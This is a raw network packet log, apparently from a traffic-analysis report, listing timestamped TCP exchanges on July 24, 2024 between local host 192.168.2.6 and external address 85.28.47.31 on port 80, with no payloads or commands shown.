                                                                                        Jul 24, 2024 07:14:12.756649017 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.756689072 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.756701946 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.758945942 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.759028912 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.759464025 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.759476900 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.759540081 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.761441946 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.761492968 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.763761044 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.763825893 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.764261007 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.764272928 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.764281988 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.764301062 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.764324903 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.764324903 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.766244888 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.766292095 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.768563032 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.768615961 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.769071102 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.769083023 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.769093037 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.769112110 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.769134045 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.773411989 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.773427963 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.773474932 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.774368048 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.774378061 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.774388075 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.774406910 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.774434090 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.778126955 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.778136969 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.778166056 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.778181076 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.779167891 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.779180050 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.779222012 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.782867908 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.782880068 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.782983065 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.783895016 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.783906937 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.783917904 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.783942938 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.783958912 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.787589073 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.787605047 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.787651062 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.788593054 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.788604975 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.788630009 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.788655043 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.792331934 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.792346954 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.792382002 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.792401075 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.793262959 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.793287039 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.793297052 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.793301105 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.793320894 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.793338060 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.797054052 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.797068119 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.797108889 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.798052073 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.798063993 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.798109055 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.799993038 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.800039053 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.832122087 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.832173109 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.832510948 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.832546949 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.832706928 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.832736969 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.833607912 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.833622932 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.833642006 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.833657026 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.841103077 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.841160059 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.841547966 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.841567993 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.841587067 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.841597080 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.843343019 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.843359947 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.843389988 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.843405008 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.845065117 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.845081091 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.845108986 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.845122099 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.846963882 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.846986055 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.847028017 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.847872019 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.847909927 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.848705053 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.848718882 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.848741055 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.848752975 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.850008011 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.850023985 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.850050926 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.850065947 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.851548910 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.851563931 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.851592064 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.851605892 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.853076935 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.853091955 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.853101969 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.853117943 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.853133917 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.854644060 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.854660988 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.854671955 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.854696989 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.854718924 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.856235981 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.856251001 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.856281042 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.856295109 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.857721090 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.857737064 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.857769012 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.857801914 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.859067917 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.859081984 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.859107971 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.859122992 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.860410929 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.860424042 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.860435963 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.860450029 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.860467911 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.861582994 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.861598015 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.861619949 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.861645937 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.862884998 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.862900972 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.862910032 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.862930059 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.862955093 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.863831997 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.863846064 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.863873959 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.863893986 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.864922047 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.864937067 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.864964962 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.864975929 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.866043091 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.866058111 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.866091013 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.866101027 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.867065907 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.867080927 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.867091894 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.867110968 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.867124081 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.867136955 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.868339062 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.868351936 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.868385077 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.868393898 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.869474888 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.869491100 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.869518042 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.869532108 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.870688915 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.870702982 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.870764971 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.871938944 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.871954918 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.871967077 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.871984005 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.872014046 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.873017073 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.873033047 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.873059034 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.873079062 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.873678923 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.873692989 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.873717070 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.873730898 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.874553919 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.874569893 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.874598980 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.874609947 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.875391960 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.875407934 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.875442982 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.875459909 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.876220942 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.876235008 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.876246929 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.876262903 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.876291037 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.877070904 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.877093077 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.877118111 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.877144098 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.877654076 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.877667904 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.877691031 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.877712965 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.878495932 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.878509045 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.878544092 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.879388094 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.879400969 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.879411936 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.879426956 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.879462004 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.880228043 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.880240917 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.880275011 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.880294085 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.881134033 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.881149054 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.881181002 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.881198883 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.882004976 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.882019043 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.882042885 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.882060051 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.882879972 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.882894993 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.882924080 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.882937908 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.883405924 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.883421898 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.883519888 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.923088074 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.923224926 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.923834085 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.923847914 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.923903942 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.924041033 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.924052954 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.924096107 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.925185919 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.925199032 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.925209999 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.925246954 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.925278902 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.930330992 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.930398941 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.930531025 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.930542946 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.930723906 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.931325912 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.931338072 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.931380987 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.931408882 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.932127953 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.932178020 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.932745934 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.932756901 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.932796955 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.932827950 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.933336020 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.933347940 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.933387041 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.933418989 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.934155941 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.934169054 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.934178114 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.934210062 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.934236050 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.935028076 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.935039043 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.935081959 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.935129881 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.935861111 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.935872078 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.935882092 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.935904980 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.935937881 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.937912941 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.937967062 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.938060999 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.938102007 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.938143015 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.938185930 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.938483953 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.938496113 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.938618898 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.938618898 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.939167023 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.939179897 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.939215899 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.939269066 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.939858913 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.939872026 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.939904928 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.939937115 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.940567017 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.940578938 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.940612078 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.940644979 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.941225052 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.941236973 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.941248894 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.941272020 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.941302061 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.941898108 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.941909075 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.941943884 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.941972971 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.942585945 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.942598104 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.942606926 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.942661047 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.943281889 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.943300962 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.943336964 CEST4971180192.168.2.685.28.47.31
